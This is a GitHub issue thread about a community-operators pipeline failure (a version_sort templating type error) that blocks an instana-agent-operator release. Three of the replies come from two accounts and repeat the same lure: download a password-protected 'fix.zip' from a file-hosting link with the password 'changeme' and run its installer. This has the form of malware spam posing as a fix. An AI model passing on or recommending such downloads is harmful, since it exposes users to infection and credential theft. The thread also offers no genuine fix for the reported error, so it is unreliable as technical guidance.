### ISSUE TITLE
Build break: Operator instana-agent-operator is not passing the pipeline any more

### ISSUE THREAD

**Issue by konrad-ohms** [k8s-operatorhub/community-operators#4910]
Hi,

I am trying to promote a release of the instana agent operator to the community-operators catalog in https://github.com/k8s-operatorhub/community-operators/pull/4869.
For some reason the PR traffic light check is showing:

```
TASK [operator_info : Setting list of versions from directory structre] ********
fatal: [localhost]: FAILED! => 
  msg: 'Unexpected templating type error occurred on ({{ oi_versions_find.files | map(attribute=''path'' ) | map(''basename'') | list | community.general.version_sort }}): ''<'' not supported between instances of ''str'' and ''int''. ''<'' not supported between instances of ''str'' and ''int'''
```

I am a bit lost here, could someone please help me out?
I do not think that we changed our automation and we were able to release to [redhat-openshift-ecosystem/redhat-marketplace-operators: PR 822](https://github.com/redhat-openshift-ecosystem/redhat-marketplace-operators/pull/822) and [redhat-openshift-ecosystem/certified-operators: PR 4304](https://github.com/redhat-openshift-ecosystem/certified-operators/pull/4304)

Was there a new requirement added recently? I saw that other operators were merged, for some reason, so I guess it is not a general issue with the pipeline.

Thanks for your help
Konrad

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by konrad-ohms** [comment]
thanks, problem was solved
